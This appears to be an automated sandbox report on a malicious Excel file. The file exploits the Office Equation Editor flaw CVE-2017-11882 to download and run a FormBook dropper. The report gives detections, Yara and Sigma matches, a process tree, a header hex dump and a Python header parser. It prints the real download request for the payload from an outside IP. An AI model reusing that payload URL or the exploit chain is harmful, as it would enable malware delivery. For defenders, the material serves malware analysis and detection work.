
Windows Analysis Report: Packing List.xlsx

Overview

General Information

Sample Name: Packing List.xlsx
Analysis ID: 510251
MD5: 74c72f37e68bc3a8071467dd12bfaa7f
SHA1: 5dd9599fde86870f52169a85cfb76020f504e43c
SHA256: de736eaf65c73f1aef5b09aa639d82e44129ac1300fd5411cab342e9e33faf7c
Tags: VelvetSweatshop, xlsx

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: File Dropped By EQNEDT32EXE
Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Injects a PE file into a foreign process
Sigma detected: Execution from Suspicious Folder
Office equation editor drops PE file
Machine Learning detection for dropped file
Drops PE files to the user root directory
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Contains functionality to call native functions
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Downloads executable code via HTTP
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Checks if the current process is being debugged
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to read data from the clipboard

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 1292 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
  • EQNEDT32.EXE (PID: 1532 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 1836 cmdline: 'C:\Users\Public\vbc.exe' MD5: DF330AB2A2E5AA4AC947315EE3F93992)
      • vbc.exe (PID: 2228 cmdline: 'C:\Users\Public\vbc.exe' MD5: DF330AB2A2E5AA4AC947315EE3F93992)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000006.00000000.476970202.00000000001C0000.00000040.00000001.sdmp | MAL_Neshta_Generic | Detects Neshta malware | Florian Roth
  • 0x6130:$op1: 85 C0 93 0F 85 62 FF FF FF 5E 5B 89 EC 5D C2 04
  • 0x3e9e:$op2: E8 E5 F1 FF FF 8B C3 E8 C6 FF FF FF 85 C0 75 0C
  • 0x2460:$op3: EB 02 33 DB 8B C3 5B C3 53 85 C0 74 15 FF 15 34
00000006.00000000.476210300.00000000001C0000.00000040.00000001.sdmp | MAL_Neshta_Generic | Detects Neshta malware | Florian Roth
  • 0x6130:$op1: 85 C0 93 0F 85 62 FF FF FF 5E 5B 89 EC 5D C2 04
  • 0x3e9e:$op2: E8 E5 F1 FF FF 8B C3 E8 C6 FF FF FF 85 C0 75 0C
  • 0x2460:$op3: EB 02 33 DB 8B C3 5B C3 53 85 C0 74 15 FF 15 34
00000006.00000000.475402924.00000000001C0000.00000040.00000001.sdmp | MAL_Neshta_Generic | Detects Neshta malware | Florian Roth
  • 0x6130:$op1: 85 C0 93 0F 85 62 FF FF FF 5E 5B 89 EC 5D C2 04
  • 0x3e9e:$op2: E8 E5 F1 FF FF 8B C3 E8 C6 FF FF FF 85 C0 75 0C
  • 0x2460:$op3: EB 02 33 DB 8B C3 5B C3 53 85 C0 74 15 FF 15 34
00000006.00000000.482711816.00000000001C0000.00000040.00000001.sdmp | MAL_Neshta_Generic | Detects Neshta malware | Florian Roth
  • 0x6130:$op1: 85 C0 93 0F 85 62 FF FF FF 5E 5B 89 EC 5D C2 04
  • 0x3e9e:$op2: E8 E5 F1 FF FF 8B C3 E8 C6 FF FF FF 85 C0 75 0C
  • 0x2460:$op3: EB 02 33 DB 8B C3 5B C3 53 85 C0 74 15 FF 15 34
00000005.00000002.488920647.00000000030BA000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
(9 further entries collapsed in the original report)

Unpacked PEs

Source | Rule | Description | Author | Strings
6.0.vbc.exe.1c0000.9.unpack | MAL_Neshta_Generic | Detects Neshta malware | Florian Roth
  • 0x5530:$op1: 85 C0 93 0F 85 62 FF FF FF 5E 5B 89 EC 5D C2 04
  • 0x329e:$op2: E8 E5 F1 FF FF 8B C3 E8 C6 FF FF FF 85 C0 75 0C
  • 0x1860:$op3: EB 02 33 DB 8B C3 5B C3 53 85 C0 74 15 FF 15 34
6.0.vbc.exe.1c0000.11.raw.unpack | MAL_Neshta_Generic | Detects Neshta malware | Florian Roth
  • 0x6130:$op1: 85 C0 93 0F 85 62 FF FF FF 5E 5B 89 EC 5D C2 04
  • 0x3e9e:$op2: E8 E5 F1 FF FF 8B C3 E8 C6 FF FF FF 85 C0 75 0C
  • 0x2460:$op3: EB 02 33 DB 8B C3 5B C3 53 85 C0 74 15 FF 15 34
6.0.vbc.exe.1c0000.13.unpack | MAL_Neshta_Generic | Detects Neshta malware | Florian Roth
  • 0x5530:$op1: 85 C0 93 0F 85 62 FF FF FF 5E 5B 89 EC 5D C2 04
  • 0x329e:$op2: E8 E5 F1 FF FF 8B C3 E8 C6 FF FF FF 85 C0 75 0C
  • 0x1860:$op3: EB 02 33 DB 8B C3 5B C3 53 85 C0 74 15 FF 15 34
6.0.vbc.exe.1c0000.15.unpack | MAL_Neshta_Generic | Detects Neshta malware | Florian Roth
  • 0x5530:$op1: 85 C0 93 0F 85 62 FF FF FF 5E 5B 89 EC 5D C2 04
  • 0x329e:$op2: E8 E5 F1 FF FF 8B C3 E8 C6 FF FF FF 85 C0 75 0C
  • 0x1860:$op3: EB 02 33 DB 8B C3 5B C3 53 85 C0 74 15 FF 15 34
6.0.vbc.exe.1c0000.7.unpack | MAL_Neshta_Generic | Detects Neshta malware | Florian Roth
  • 0x5530:$op1: 85 C0 93 0F 85 62 FF FF FF 5E 5B 89 EC 5D C2 04
  • 0x329e:$op2: E8 E5 F1 FF FF 8B C3 E8 C6 FF FF FF 85 C0 75 0C
  • 0x1860:$op3: EB 02 33 DB 8B C3 5B C3 53 85 C0 74 15 FF 15 34
(19 further entries collapsed in the original report)

Sigma Overview

Exploits:

Sigma detected: EQNEDT32.EXE connecting to internet
Source: Network Connection | Author: Joe Security | Data: DestinationIp: 192.227.228.38, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1532, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
Sigma detected: File Dropped By EQNEDT32EXE
Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1532, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882
Source: Process started | Author: Florian Roth | Data: Command: 'C:\Users\Public\vbc.exe', CommandLine: 'C:\Users\Public\vbc.exe', CommandLine|base64offset|contains: (empty), Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1532, ProcessCommandLine: 'C:\Users\Public\vbc.exe', ProcessId: 1836
Sigma detected: Execution from Suspicious Folder
Source: Process started | Author: Florian Roth | Data: the same process-start event (Image: C:\Users\Public\vbc.exe, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1532, ProcessId: 1836)

Jbx Signature Overview

AV Detection:

Multi AV Scanner detection for submitted file
Source: Packing List.xlsx | VirusTotal: Detection: 32%
Source: Packing List.xlsx | ReversingLabs: Detection: 29%
Yara detected FormBook
Source: Yara match | File source: 00000005.00000002.488920647.00000000030BA000.00000004.00000001.sdmp, type: MEMORY
Machine Learning detection for dropped file
Source: C:\Users\Public\vbc.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe | Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 6.0.vbc.exe.1c0000.13.unpack | Avira: Label: W32/Delf.I
Source: 6.0.vbc.exe.1c0000.15.unpack | Avira: Label: W32/Delf.I
Source: 6.0.vbc.exe.1c0000.7.unpack | Avira: Label: W32/Delf.I
Source: 6.0.vbc.exe.1c0000.9.unpack | Avira: Label: W32/Delf.I
Source: 6.0.vbc.exe.1c0000.21.unpack | Avira: Label: W32/Delf.I
Source: 6.2.vbc.exe.1c0000.0.unpack | Avira: Label: TR/ATRAPS.Gen
Source: 6.0.vbc.exe.1c0000.5.unpack | Avira: Label: W32/Delf.I
Source: 6.0.vbc.exe.1c0000.23.unpack | Avira: Label: W32/Delf.I
Source: 6.0.vbc.exe.1c0000.17.unpack | Avira: Label: W32/Delf.I
Source: 6.0.vbc.exe.1c0000.11.unpack | Avira: Label: W32/Delf.I
Source: 6.0.vbc.exe.1c0000.25.unpack | Avira: Label: W32/Delf.I
Source: 6.0.vbc.exe.1c0000.19.unpack | Avira: Label: W32/Delf.I
Source: 5.2.vbc.exe.30b0000.5.unpack | Avira: Label: W32/Delf.I

Exploits:

Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\Public\vbc.exe
Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Other signature sources:

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: wntdll.pdb | source: vbc.exe, 00000005.00000003.474355640.000000000F300000.00000004.00000001.sdmp
Source: C:\Users\Public\vbc.exe | Code function: 5_2_00405E93 FindFirstFileA, FindClose
Source: C:\Users\Public\vbc.exe | Code function: 5_2_004054BD DeleteFileA, lstrcatA, lstrcatA, lstrlenA, FindFirstFileA, DeleteFileA, FindNextFileA, FindClose, RemoveDirectoryA
Source: C:\Users\Public\vbc.exe | Code function: 5_2_00402671 FindFirstFileA
Source: C:\Users\Public\vbc.exe | Code function: 6_2_00402671 FindFirstFileA
Source: C:\Users\Public\vbc.exe | Code function: 6_2_00405E93 FindFirstFileA, FindClose
Source: C:\Users\Public\vbc.exe | Code function: 6_2_004054BD DeleteFileA, lstrcatA, lstrcatA, lstrlenA, FindFirstFileA, DeleteFileA, FindNextFileA, FindClose, RemoveDirectoryA
Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.227.228.38:80
Source: excel.exe | Memory has grown: Private usage: 4MB, later: 47MB
Source: Joe Sandbox View | ASN Name: AS-COLOCROSSINGUS
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 28 Oct 2021 11:38:05 GMTServer: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.11Last-Modified: Wed, 27 Oct 2021 06:07:30 GMTETag: "39809-5cf4f68c9b908"Accept-Ranges: bytesContent-Length: 235529Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad 30 28 81 e9 51 46 d2 e9 51 46 d2 e9 51 46 d2 2a 5e 19 d2 eb 51 46 d2 e9 51 47 d2 71 51 46 d2 2a 5e 1b d2 e6 51 46 d2 bd 72 76 d2 e3 51 46 d2 2e 57 40 d2 e8 51 46 d2 52 69 63 68 e9 51 46 d2 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 65 3a ff 56 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 5c 00 00 00 d6 01 00 00 04 00 00 fb 30 00 00 00 10 00 00 00 70 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 e0 02 00 00 04 00 00 00 00 00 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 18 74 00 00 a0 00 00 00 00 d0 02 00 e0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 00 00 7c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 eb 5a 00 00 00 10 00 00 00 5c 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 96 11 00 00 00 70 00 00 00 12 00 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 38 b0 01 00 00 90 00 00 
00 06 00 00 00 72 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 80 00 00 00 50 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 e0 09 00 00 00 d0 02 00 00 0a 00 00 00 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic | HTTP traffic detected:
  GET /0078/vbc.exe HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
  Host: 192.227.228.38
  Connection: Keep-Alive
Source: unknown | TCP traffic detected without corresponding DNS query: 192.227.228.38 (this line is repeated 50 times in the report)
Source: vbc.exe, vbc.exe, 00000006.00000000.474777707.0000000000409000.00000008.00020000.sdmp, vbc.exe.3.dr | String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: vbc.exe, 00000005.00000000.468788902.0000000000409000.00000008.00020000.sdmp, vbc.exe, 00000006.00000000.474777707.0000000000409000.00000008.00020000.sdmp, vbc.exe.3.dr | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: vbc.exe, 00000005.00000002.488324538.00000000021E0000.00000002.00020000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: vbc.exe, 00000005.00000002.488324538.00000000021E0000.00000002.00020000.sdmp | String found in binary or memory: http://www.%s.comPA
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\27DB9FE4.emf
Source: global traffic | HTTP traffic detected: GET /0078/vbc.exe HTTP/1.1 (the same request, with the same browser User-Agent, as listed above)
Source: C:\Users\Public\vbc.exe | Code function: 5_2_00404FC2 GetDlgItem, GetDlgItem, GetDlgItem, GetDlgItem, GetClientRect, GetSystemMetrics, SendMessageA, SendMessageA, SendMessageA, SendMessageA, SendMessageA, SendMessageA, ShowWindow, ShowWindow, GetDlgItem, SendMessageA, SendMessageA, SendMessageA, GetDlgItem, CreateThread, CloseHandle, ShowWindow, ShowWindow, ShowWindow, ShowWindow, SendMessageA, CreatePopupMenu, AppendMenuA, GetWindowRect, TrackPopupMenu, SendMessageA, OpenClipboard, EmptyClipboard, GlobalAlloc, GlobalLock, SendMessageA, GlobalUnlock, SetClipboardData, CloseClipboard
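The MZ/PE bytes in the HTTP 200 response above can be checked by hand rather than trusted on the strength of the application/x-msdownload Content-Type. The following is example code added for this page, not Joe Sandbox code: it rebuilds the first 0x288 bytes of the downloaded vbc.exe from the report's Data Raw dump (DOS header, Rich header, COFF and PE32 optional headers and the five section headers are copied verbatim; the 16 data-directory entries, all zero except import, resource and IAT, are packed from the values readable in the dump), parses them with the standard library only, and derives two facts the dump does not state outright: the uninitialised .ndata section is the section layout of an NSIS installer stub, consistent with the nsis.sf.net/NSIS_Error strings found in vbc.exe, and Content-Length 235529 minus the end of the last section (0x8200) leaves a 202249-byte overlay, which is where NSIS stores its compressed payload. On a file from disk, `open(path, "rb").read()` replaces `build_sample()`.

```python
import struct
from datetime import datetime, timezone

# Example added for this page (not Joe Sandbox code). Offsets 0x000-0x13F of the
# downloaded vbc.exe, copied from the report's Data Raw dump: DOS header, DOS stub,
# Rich header, "PE\0\0", COFF header and the PE32 optional header up to NumberOfRvaAndSizes.
HEADER_HEX = """
4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00
0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f
74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00
ad 30 28 81 e9 51 46 d2 e9 51 46 d2 e9 51 46 d2 2a 5e 19 d2 eb 51 46 d2 e9 51 47 d2 71 51 46 d2
2a 5e 1b d2 e6 51 46 d2 bd 72 76 d2 e3 51 46 d2 2e 57 40 d2 e8 51 46 d2 52 69 63 68 e9 51 46 d2
00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 65 3a ff 56 00 00 00 00 00 00 00 00 e0 00 0f 01
0b 01 06 00 00 5c 00 00 00 d6 01 00 00 04 00 00 fb 30 00 00 00 10 00 00 00 70 00 00 00 00 40 00
00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 e0 02 00 00 04 00 00
00 00 00 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00
"""
# Offsets 0x140-0x1BF: the 16 data directories, packed from the values in the dump
# (only import, resource and IAT are non-zero).
DATA_DIRS = [(0, 0)] * 16
DATA_DIRS[1] = (0x7418, 0xA0)     # import table
DATA_DIRS[2] = (0x2D000, 0x9E0)   # resources
DATA_DIRS[12] = (0x7000, 0x27C)   # IAT
# Offsets 0x1C0-0x287: the five IMAGE_SECTION_HEADERs, copied from the dump.
SECTION_TABLE_HEX = """
2e 74 65 78 74 00 00 00 eb 5a 00 00 00 10 00 00 00 5c 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60
2e 72 64 61 74 61 00 00 96 11 00 00 00 70 00 00 00 12 00 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40
2e 64 61 74 61 00 00 00 38 b0 01 00 00 90 00 00 00 06 00 00 00 72 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0
2e 6e 64 61 74 61 00 00 00 80 00 00 00 50 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0
2e 72 73 72 63 00 00 00 e0 09 00 00 00 d0 02 00 00 0a 00 00 00 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40
"""
CONTENT_LENGTH = 235529  # Content-Length of the HTTP response that delivered vbc.exe


def build_sample():
    """Reassemble the header bytes exactly as they appear in the download."""
    dirs = b"".join(struct.pack("<II", rva, size) for rva, size in DATA_DIRS)
    return bytes.fromhex(HEADER_HEX) + dirs + bytes.fromhex(SECTION_TABLE_HEX)


def parse_pe_headers(data):
    """Parse the DOS, COFF and PE32 optional headers plus the section table.
    Raises ValueError on bad signatures and struct.error on truncated input."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    machine, nsections, timestamp, _, _, opt_size, characteristics = struct.unpack_from(
        "<HHIIIHH", data, e_lfanew + 4)
    opt = e_lfanew + 24
    if struct.unpack_from("<H", data, opt)[0] != 0x10B:
        raise ValueError("not a PE32 optional header")
    entry_point = struct.unpack_from("<I", data, opt + 16)[0]
    image_base = struct.unpack_from("<I", data, opt + 28)[0]
    subsystem = struct.unpack_from("<H", data, opt + 68)[0]
    sections = []
    for i in range(nsections):
        name, vsize, va, rawsize, rawptr, _, _, _, _, flags = struct.unpack_from(
            "<8sIIIIIIHHI", data, opt + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode("ascii"), "virtual_size": vsize,
                         "virtual_address": va, "raw_size": rawsize, "raw_pointer": rawptr,
                         "characteristics": flags})
    return {
        "machine": machine, "number_of_sections": nsections, "timestamp": timestamp,
        "compile_time": datetime.fromtimestamp(timestamp, timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC"),
        "characteristics": characteristics, "entry_point": entry_point,
        "image_base": image_base, "subsystem": subsystem, "sections": sections,
        # first byte after the last section's raw data; anything beyond it is overlay
        "end_of_sections": max(s["raw_pointer"] + s["raw_size"] for s in sections),
    }


def overlay_size(info, file_size):
    """Bytes appended after the last section; NSIS keeps its compressed payload there."""
    return file_size - info["end_of_sections"]


def looks_like_nsis(info):
    """The NSIS stub carries an uninitialised '.ndata' section (no raw data on disk)."""
    return any(s["name"] == ".ndata" and s["raw_size"] == 0 for s in info["sections"])


if __name__ == "__main__":
    info = parse_pe_headers(build_sample())
    print(f"machine=0x{info['machine']:x} sections={info['number_of_sections']} "
          f"entry=0x{info['entry_point']:x} built={info['compile_time']}")
    for s in info["sections"]:
        print(f"  {s['name']:<7} va=0x{s['virtual_address']:05x} raw=0x{s['raw_size']:05x}"
              f" @0x{s['raw_pointer']:04x} flags=0x{s['characteristics']:08x}")
    print(f"overlay={overlay_size(info, CONTENT_LENGTH)} bytes, nsis_layout={looks_like_nsis(info)}")
```

The parser deliberately reads e_lfanew and SizeOfOptionalHeader from the file instead of assuming fixed offsets, because hostile samples pad or shrink those fields; the struct.error raised on a truncated buffer is the correct outcome for a partial download like the one the sandbox captured, not something to swallow.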

E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File source: 00000005.00000002.488920647.00000000030BA000.00000004.00000001.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000005.00000002.488920647.00000000030BA000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.488920647.00000000030BA000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\vbc.exe
Matched rule: MAL_Neshta_Generic (author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, date = 2018-01-15, modified = 2021-04-14, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb) on the following sources:
  • 6.0.vbc.exe.1c0000.9.unpack, type: UNPACKEDPE
  • 6.0.vbc.exe.1c0000.11.raw.unpack, type: UNPACKEDPE
  • 6.0.vbc.exe.1c0000.13.unpack, type: UNPACKEDPE
  • 6.0.vbc.exe.1c0000.15.unpack, type: UNPACKEDPE
  • 6.0.vbc.exe.1c0000.7.unpack, type: UNPACKEDPE
  • 6.0.vbc.exe.1c0000.23.raw.unpack, type: UNPACKEDPE
  • 6.0.vbc.exe.1c0000.17.raw.unpack, type: UNPACKEDPE
  • 6.0.vbc.exe.1c0000.21.unpack, type: UNPACKEDPE
  • 6.0.vbc.exe.1c0000.13.raw.unpack, type: UNPACKEDPE
  • 6.0.vbc.exe.1c0000.25.raw.unpack, type: UNPACKEDPE
  • 6.2.vbc.exe.1c0000.0.unpack, type: UNPACKEDPE
  • 6.0.vbc.exe.1c0000.5.unpack, type: UNPACKEDPE
  • 6.0.vbc.exe.1c0000.21.raw.unpack, type: UNPACKEDPE
  • 6.0.vbc.exe.1c0000.23.unpack, type: UNPACKEDPE
  • 6.0.vbc.exe.1c0000.17.unpack, type: UNPACKEDPE
  • 6.0.vbc.exe.1c0000.11.unpack, type: UNPACKEDPE
  • 6.0.vbc.exe.1c0000.25.unpack, type: UNPACKEDPE
  • 6.0.vbc.exe.1c0000.19.unpack, type: UNPACKEDPE
  • 6.0.vbc.exe.1c0000.15.raw.unpack, type: UNPACKEDPE
  • 6.0.vbc.exe.1c0000.19.raw.unpack, type: UNPACKEDPE
  • 5.2.vbc.exe.30b0000.5.raw.unpack, type: UNPACKEDPE
  • 5.2.vbc.exe.30b0000.5.unpack, type: UNPACKEDPE
  • 6.0.vbc.exe.1c0000.7.raw.unpack, type: UNPACKEDPE
  • 6.0.vbc.exe.1c0000.9.raw.unpack, type: UNPACKEDPE
  • 00000006.00000000.476970202.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
  • 00000006.00000000.476210300.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
  • 00000006.00000000.475402924.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
  • 00000006.00000000.482711816.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
    Source: 00000005.00000002.488920647.00000000030BA000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
    Source: 00000005.00000002.488920647.00000000030BA000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
    Source: 00000006.00000000.479470505.00000000001C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
    Source: 00000006.00000000.480530429.00000000001C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
